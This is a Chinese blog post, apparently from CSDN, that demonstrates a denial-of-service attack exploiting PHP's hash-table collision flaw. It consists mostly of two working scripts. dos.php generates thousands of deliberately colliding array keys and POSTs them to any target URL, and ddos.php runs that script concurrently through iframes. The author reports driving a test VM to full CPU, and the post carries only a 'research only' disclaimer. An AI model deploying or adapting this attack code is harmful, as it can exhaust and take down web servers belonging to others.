通过PHP的hash冲突漏洞进行DDoS攻击

参考网站:http://blog.csdn.net/linvo/article/details/7169718

声明:本文内容只用于研究学习使用,请勿用于非法行为!

上回咱说到了最近爆出的hash表碰撞漏洞,包括java、python、php等在内的很多常用语言均未幸免,今晚咱就来实际看看它的威力。

攻击原理:

通过向目标服务器post一组精心拼凑的数组参数,到达服务端后语言底层处理接收到的数组参数时,由于该漏洞的存在造成CPU的大量消耗,最终导致服务器资源耗尽。

不用什么花哨的手法,就用PHP简单实现下看下效果,点到即止。

文件:dos.php

    // 目标地址  
    // 只要目标地址存在,不用管它是干嘛的  
    $host = 'http://127.0.0.1/test.php';   
      
    $data = '';  
    $size = pow(2, 15);  
    for ($key=0, $max=($size-1)*$size; $key<=$max; $key+=$size)  
    {  
        $data .= '&array[' . $key . ']=0';  
    }  
      
    $ret = curl($host, ltrim($data,'&'));  
    var_dump($ret);  
      
      
    function curl($url, $post, $timeout = 30){  
        $ch = curl_init();  
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
        curl_setopt($ch, CURLOPT_TIMEOUT, $timeout);  
        curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout - 5);  
        curl_setopt($ch, CURLOPT_HTTPHEADER, array('Expect:'));    
        curl_setopt($ch, CURLOPT_URL, $url);  
        curl_setopt($ch, CURLOPT_POST, true);  
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);  
        $output = curl_exec($ch);  
        if ($output === false) return false;  
        $info = curl_getinfo($ch);  
        $http_code = $info['http_code'];  
        if ($http_code == 404) return false;  
        curl_close($ch);  
        return $output;  
    }  

文件:ddos.php

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">  
    <html xmlns="http://www.w3.org/1999/xhtml">  
    <head>  
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312" />  
    <title>DDOS</title>  
    </head>  
      
    <body>  
    <?php  
    for($i=0; $i<5; $i++){//并发数  
        echo '<iframe src="dos.php?a='.$i.'" scrolling="false" frameborder="1" allowtransparency="true" style="background-color:transparent;"></iframe>';  
    }  
    ?>  
    </body>  
    </html>  

虽然我的测试目标服务器是台虚拟机,但仅用了2个并发就使目标机CPU飙到了100%。但是100%的CPU占用并不代表着就已经拒绝服务,点到为止:)

----------------------------------------------- 华丽丽的分割线 ----------------------------------------------------------

就在写这篇的时候,时间已步入2012,祝大家新年快乐,笑口常开:D


  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值